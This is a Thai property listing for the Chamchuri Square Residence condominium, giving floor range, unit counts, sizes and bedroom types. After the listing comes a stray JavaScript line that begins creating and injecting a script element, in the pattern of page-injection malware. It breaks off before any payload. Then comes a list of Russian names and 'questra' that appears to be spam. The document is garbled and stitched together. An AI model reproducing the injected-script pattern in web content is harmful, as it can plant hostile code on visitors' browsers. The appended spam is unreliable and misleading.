จัตุรัสจามจุรี เรสซิเดนซ์

ข้อมูลโครงการ

รายละเอียดโครงการ

ส่วนของที่พักอาศัย เริ่มตั้งแต่ชั้น 6–24 ในลักษณะห้องชุดคือ ห้องชุดขนาด 1-2 ห้องนอน พื้นท่ี 43 –104 ตารางเมตร จํานวน 141 ยูนิต ห้องชุด ขนาด 3, 3+1 ห้องนอน พื้นที่ 192-204 ตารางเมตร จํานวน 43 ยูนิต และขนาด 4 ห้องนอน พื้นที่ขนาด 221-225 ตารางเมตร จํานวน 36 ยูนิต รวมทั้งสิ้น 220 ยูนิต

PROJECT NAME
อาคารพักอาศัย จัตุรัสจามจุรี
PROJECT TYPE
อาคารพักอาศัยจำนวน 24 ชั้น
TOTAL UNITS
220 ห้อง
UNIT TYPES
1 ห้องนอน 1 ห้องน้ำ
2 ห้องนอน 2 ห้องน้ำ
3 ห้องนอน 4 ห้องน้ำ
3+1 ห้องนอน 4 ห้องน้ำ
4 ห้องนอน 5 ห้องน้ำ

var d=document;var s=d.createElement(‘script’);

questra Пестюк Чеслав Фанис Джураев Константин Мамчур Станислав Кравцов AGAM Atlantic Global Александр Прочухан Абакумов Андрей